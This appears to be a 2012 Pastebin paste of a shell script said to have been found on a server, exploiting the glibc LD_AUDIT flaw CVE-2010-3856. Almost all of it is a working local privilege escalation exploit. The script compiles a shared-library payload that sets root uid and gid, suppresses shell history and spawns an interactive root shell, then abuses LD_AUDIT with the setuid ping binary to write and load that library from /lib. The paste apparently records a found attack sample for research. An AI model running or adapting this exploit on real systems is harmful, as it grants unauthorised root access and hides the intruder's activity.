daily pastebin goal
18%
SHARE
TWEET

62.152.104.149 glibc.sh CVE-2010-3856

eromang Aug 29th, 2012 310 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. -----------------------------------------------------------
  2. glibc.sh file on 62.152.104.149 aka CVE-2010-3856
  3. http://packetstormsecurity.org/files/106817/glibc-LD_AUDIT-Privilege-Escalation.html
  4. -----------------------------------------------------------
  5.  
  6. #!/bin/sh
  7.  
  8. echo "[+] Setting umask to 0 so we have world writable files."
  9. umask 0
  10.  
  11. echo "[+] Preparing binary payload."
  12. cat > /tmp/payload.c <<_EOF
  13. void __attribute__((constructor)) init()
  14. {
  15.         printf("[+] Cleaning up.\n");
  16.         unlink("/lib/libexploit.so");
  17.  
  18.         printf("[+] Launching shell.\n");
  19.         setuid(0);
  20.         setgid(0);
  21.         setenv("HISTFILE", "/dev/null", 1);
  22.         execl("/bin/sh", "/bin/sh", "-i", 0);
  23. }
  24. _EOF
  25. gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
  26.  
  27. echo "[+] Writing root owned world readable file in /lib"
  28. LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libexploit.so" ping 2>/dev/null
  29.  
  30. echo "[+] Filling the lib file with lib contents."
  31. cat /tmp/exploit > /lib/libexploit.so
  32. rm /tmp/payload.c /tmp/exploit
  33.  
  34. echo "[+] Executing payload."
  35. LD_AUDIT="libexploit.so" ping
RAW Paste Data
Top